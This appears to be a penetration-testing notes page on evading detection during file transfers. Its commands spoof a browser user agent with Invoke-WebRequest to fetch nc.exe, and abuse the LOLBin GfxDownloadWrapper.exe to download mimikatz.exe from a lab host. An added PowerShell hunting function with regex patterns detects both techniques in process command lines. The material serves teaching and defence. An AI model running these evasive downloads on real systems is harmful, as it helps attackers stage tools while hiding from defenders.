Detection

User Agent Changing

Invoke-WebRequest allows the user agent to be changed so that the request appears to come from a web browser. Without this, the default user agent identifies the request as PowerShell in server and proxy logs.

Listing out User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | Format-List

Request with Chrome User Agent

$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

LOLBAS / GTFOBins

If PowerShell and CMD may alert defenders, LOLBins can be used to hide requests.

One example is the Intel Graphics Driver's GfxDownloadWrapper.exe.

Transferring File with GfxDownloadWrapper.exe

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
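Because a spoofed user agent makes web-server and proxy logs unreliable for spotting these downloads, the detection has to come from process command-line telemetry instead. The following is an added example (not part of the original page) that checks command lines for both techniques above: Invoke-WebRequest combined with -UserAgent or PSUserAgent, and GfxDownloadWrapper.exe being handed an HTTP URL. The sample command lines are constructed from the page's own commands; the Sysmon query at the end is optional and assumes Sysmon Event ID 1 logging is enabled.

```powershell
# Added example: hunt process-creation command lines for the two download
# techniques described on this page. Not code from the original page.

function Find-SuspiciousDownload {
    param([string[]]$CommandLine)

    # Each rule name maps to a case-insensitive regex over the command line.
    $Rules = [ordered]@{
        'Invoke-WebRequest with spoofed User-Agent' = '(?i)Invoke-WebRequest.*-UserAgent|PSUserAgent\]::'
        'GfxDownloadWrapper.exe fetching a URL'     = '(?i)GfxDownloadWrapper\.exe.*https?://'
    }

    foreach ($line in $CommandLine) {
        foreach ($name in $Rules.Keys) {
            if ($line -match $Rules[$name]) {
                [pscustomobject]@{ Rule = $name; CommandLine = $line }
            }
        }
    }
}

# Constructed sample command lines (values taken from this page; the path to
# GfxDownloadWrapper.exe is a placeholder, not a real driver-store location).
$SampleCommandLines = @(
    'powershell.exe -c "$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile C:\Users\Public\nc.exe"',
    '"C:\PLACEHOLDER\GfxDownloadWrapper.exe" "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"',
    'powershell.exe -c "Get-ChildItem C:\Temp"'   # benign, should not match
)

# Offline run over the constructed samples: two hits expected, the third line is ignored.
Find-SuspiciousDownload -CommandLine $SampleCommandLines | Format-Table -AutoSize

# Optional live source: Sysmon Event ID 1 (process creation). Pulls the CommandLine
# field out of the event XML so the function can be run over real telemetry.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#     ForEach-Object {
#         ([xml]$_.ToXml()).Event.EventData.Data |
#             Where-Object { $_.Name -eq 'CommandLine' } |
#             Select-Object -ExpandProperty '#text'
#     } | Find-SuspiciousDownload
```

Sysmon's CommandLine field is only as complete as the logged process arguments, so pair this with a rule on the default PowerShell user agent at the proxy to catch the cases where the user agent was not changed.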
